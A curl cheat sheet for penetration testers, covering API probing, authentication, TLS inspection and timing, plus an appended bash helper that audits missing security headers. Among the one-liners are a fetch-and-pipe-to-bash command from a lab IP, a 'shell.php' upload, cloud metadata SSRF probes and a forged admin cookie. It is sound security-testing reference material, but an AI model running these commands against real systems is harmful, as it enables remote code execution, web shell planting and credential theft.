curl Cheat Sheet
Versatile CLI for HTTP(S), file transfer, headers, and scripting web/API tests during pentests.
Overview
curl transfers data with URL syntax. Core tool for probing APIs, bypassing client restrictions, testing SSRF payloads, downloading shells, and inspecting TLS/certificate behavior.
Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.
Install
sudo apt install -y curl
curl --version
Essential commands
GET with headers
curl -i https://target/api/v1/users
POST JSON
curl -s -X POST https://target/login -H 'Content-Type: application/json' -d '{"user":"admin","pass":"test"}'
Save output
curl -o page.html https://target/
curl -O https://target/file.zip # remote filename
Common workflows
Authentication / cookies —
curl -c cookies.txt -b cookies.txt -L https://target/dashboard
curl -u user:pass https://target/basic-auth
curl -H "Authorization: Bearer TOKEN" https://target/api
Custom verbs and headers —
curl -X PUT -H 'X-Custom: value' -d 'data' https://target/resource
curl -X OPTIONS -i https://target/
curl -H "Host: internal.local" http://10.10.10.5/
SSRF / internal probe (authorized) —
curl -s "http://169.254.169.254/latest/meta-data/"
curl -g "http://[::ffff:169.254.169.254]/"
TLS / cert inspection —
curl -vI https://target/ 2>&1 | grep -E 'subject:|issuer:|SSL'
curl --insecure https://selfsigned.local/ # lab only
Upload file (multipart) —
curl -F "file=@shell.php" -F "submit=upload" https://target/upload.php
Rate / timing —
curl -w '@-' -o /dev/null -s https://target/ <<'EOF'
time_namelookup: %{time_namelookup}\n
time_connect: %{time_connect}\n
time_total: %{time_total}\n
EOF
Flags reference
| Flag | Meaning |
|---|---|
| -X METHOD | HTTP method |
| -H "Header: val" | Request header |
| -d DATA | POST body |
| -L | Follow redirects |
| -k | Insecure TLS |
| -v | Verbose |
| -s | Silent (no progress) |
| --proxy http://127.0.0.1:8080 | Burp intercept |
| -A "User-Agent" | Spoof UA |
Quick one-liners
Show only the HTTP response headers
curl -sI https://target/
Print only the HTTP status code
curl -s -o /dev/null -w '%{http_code}\n' https://target/
Send a raw cookie header
curl -b 'session=eyJ...; role=admin' https://target/dashboard
Route all traffic through Burp/ZAP for inspection
curl -x http://127.0.0.1:8080 -k https://target/
Download and pipe a script straight to bash (lab only)
curl -s http://10.10.14.5/x.sh | bash
Follow redirects but cap them (avoid loops)
curl -L --max-redirs 5 https://target/
Resolve a host to a chosen IP (vhost / split-horizon tests)
curl --resolve target.local:443:10.10.10.5 https://target.local/
Send a urlencoded form body
curl --data-urlencode 'q=admin'\''--' https://target/search
Auth & API testing
Bearer token request to a JSON API
curl -s -H 'Authorization: Bearer TOKEN' https://target/api/v1/me | jq .
Basic auth
curl -u admin:password https://target/admin
Replay a JWT and decode the payload
curl -s -H "Authorization: Bearer $JWT" https://target/api | jq .
GraphQL introspection query
curl -s -X POST https://target/graphql -H 'Content-Type: application/json' -d '{"query":"{__schema{types{name}}}"}'
Test an HTTP method override (verb tampering)
curl -X POST -H 'X-HTTP-Method-Override: PUT' https://target/resource
Tips
- Use --path-as-is to prevent curl normalizing ../ in paths (cache poisoning tests).
- curl --compressed requests gzip/br encoding and decodes the response transparently.
- Pipe to jq for JSON APIs: curl -s URL | jq .
- Prefer Burp Repeater for complex sessions; curl for automation and CI.
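An added helper, not part of the original sheet, that consumes the output of the `curl -sI` one-liner above and reports which hardening headers the final response lacks; it handles the CRLF line endings and the multi-hop output that `-L` produces. The URL handling in fetch_and_audit and both sample header blobs are constructed for illustration.

```shell
#!/usr/bin/env bash
# audit_headers: read raw response headers on stdin (as printed by curl -sI),
# look only at the final header block (last hop when -L followed redirects),
# print "missing: <name>" for each absent hardening header, and return
# 0 when nothing is missing, 1 otherwise.
audit_headers() {
  local expected='strict-transport-security content-security-policy x-content-type-options x-frame-options'
  local hdrs name missing=0
  # Drop CRs, keep the last blank-line-separated block, lowercase header names.
  hdrs=$(tr -d '\r' | awk 'BEGIN{RS=""} {blk=$0} END{print blk}' | tr '[:upper:]' '[:lower:]')
  for name in $expected; do
    if ! printf '%s\n' "$hdrs" | grep -q "^$name:"; then
      echo "missing: $name"
      missing=1
    fi
  done
  # A Server banner that carries a version number is worth noting in the report.
  if printf '%s\n' "$hdrs" | grep -Eq '^server:.*[0-9]+\.[0-9]+'; then
    echo "info: server banner includes a version"
  fi
  return "$missing"
}

# Live use against a URL you are authorized to test (hypothetical usage):
# redirects and total time are capped so a probe cannot hang or loop.
fetch_and_audit() {
  curl -sSI -L --max-redirs 5 --max-time 10 "$1" | audit_headers
}

# Constructed samples: a redirect hop followed by a weak final response,
# and a single hardened response.
SAMPLE_WEAK=$(printf 'HTTP/1.1 301 Moved Permanently\r\nLocation: https://target/\r\n\r\nHTTP/1.1 200 OK\r\nServer: Apache/2.4.41\r\nContent-Type: text/html\r\n\r\n')
SAMPLE_HARDENED=$(printf 'HTTP/1.1 200 OK\r\nServer: nginx\r\nStrict-Transport-Security: max-age=63072000\r\nContent-Security-Policy: default-src https:\r\nX-Content-Type-Options: nosniff\r\nX-Frame-Options: DENY\r\n\r\n')

demo() {
  printf '%s' "$SAMPLE_WEAK" | audit_headers || echo "weak sample: findings above"
  printf '%s' "$SAMPLE_HARDENED" | audit_headers && echo "hardened sample: no findings"
}
demo
```

Replace demo with `fetch_and_audit https://target/` to run it against a live host.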